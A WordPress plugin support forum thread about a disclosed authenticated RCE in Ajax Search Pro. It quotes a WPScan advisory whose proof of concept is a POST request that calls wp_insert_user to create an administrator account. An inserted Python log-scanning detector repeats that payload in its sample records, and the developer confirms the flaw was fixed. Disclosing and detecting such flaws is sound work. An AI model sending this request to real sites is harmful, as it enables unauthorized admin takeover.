
Authenticated RCE Vulnerability Logged Not Closed

  • #11068
    OddenCreative
    Participant

    I would like to get a status update regarding this potential exploit… I just purchased this Plugin and was starting to configure when I got an alert about a potential exploit.

    An Authentication RCE vulnerability was reported on this plugin

    ajax-search-pro 4.9.8 – 0 more info

    https://wpvulndb.com/plugins/ajax-search-pro

    https://wpvulndb.com/vulnerabilities/7859

    Ajax Search Pro – Authenticated RCE


    Description
    Affected versions unknown.

    Proof of Concept:

    This will register an administrator with username “xADMIN” and password “xPASS”:

    POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput

    With POST data:
    wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator
    Affects

    Plugin ajax-search-pro
    References

    PACKETSTORM 130955
    URL http://web.archive.org/web/20150619084745/http://research.evex.pw/?vuln=9
    Classification

    Type RCE
    OWASP Top 10 A1: Injection
    CWE CWE-94
    Miscellaneous

    Submitter A. Samman
    Submitter Twitter Evex_1337
    Views 350
    Verified No
    WPVDB ID 7859
    Timeline

    Publicly Published 2015-03-18 (over 1 year ago)
    Added 2015-03-21 (over 1 year ago)
    Last Updated 2016-04-24 (7 months ago)

    Copyright & License

    Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
    License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.
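
One way to check proxy or WAF request logs for the request shape in the proof of concept above, added here as an example and not code from the plugin, WPScan or the original post. It flags `admin-ajax.php` requests that use the `wpdreams-ajaxinput` action and supply a `wpdreams_callback` value; the `(method, url, body)` record format and the severity labels are assumptions, and the sample records are constructed.

```python
from urllib.parse import urlsplit, parse_qs

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "wpdreams-ajaxinput"          # action named in the advisory
CALLBACK_PARAM = "wpdreams_callback"   # parameter that names the function to call

def inspect_request(method, url, body=""):
    """Return a finding for a request shaped like the advisory's PoC, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith(AJAX_PATH):   # also matches sub-directory installs
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True)

    def values(name):
        # Parameters may arrive in the query string, the form body, or both.
        return query.get(name, []) + form.get(name, [])

    if ACTION not in values("action"):
        return None
    callbacks = values(CALLBACK_PARAM)
    if not callbacks:
        return None
    # A client naming a server-side function is already worth review; the
    # advisory's exact combination (user creation as administrator) is high.
    high = "wp_insert_user" in callbacks or "administrator" in values("role")
    return {"method": method, "callbacks": callbacks,
            "user_login": values("user_login"),
            "severity": "high" if high else "review"}

def scan(records):
    """records: iterable of (method, url, body) tuples from a proxy/WAF audit log."""
    return [f for f in (inspect_request(*r) for r in records) if f]

# Constructed sample records (not real traffic).
SAMPLE = [
    ("POST", "/wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php"
             "&action=wpdreams-ajaxinput",
     "wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator"),
    ("POST", "/wp-admin/admin-ajax.php", "action=heartbeat&interval=60"),
    ("POST", "/blog/wp-admin/admin-ajax.php",
     "action=wpdreams-ajaxinput&wpdreams_callback=example_function&x=1"),
    ("GET", "/wp-admin/admin-ajax.php?action=wpdreams-ajaxinput", ""),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Any `user_login` value reported in a high-severity finding can be compared against the site's current administrator accounts.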

    #11069
    Ernest Marcinko
    Keymaster

    Hi,

    It has been fixed a very long time ago, they messaged me before publishing the report so a fix was released before that.

    #11086
    OddenCreativeOddenCreative
    Participant

    Perhaps you can submit a note back to them so that they can mark it fixed, and close it. I know that if the next developer/admin comes along to check logs and sees that flagged, they will likely contact you, too.

    We run clean green on our servers. A vulnerability or exploit mark is typically grounds for removal, or we look to help fix them.

    Thanks for replying so quickly!

    #11088
    Ernest Marcinko
    Keymaster

    Hi!

    I’ve sent a message again, and they already marked it as resolved 🙂
    Thanks for notifying me, I thought this was done a long time ago.
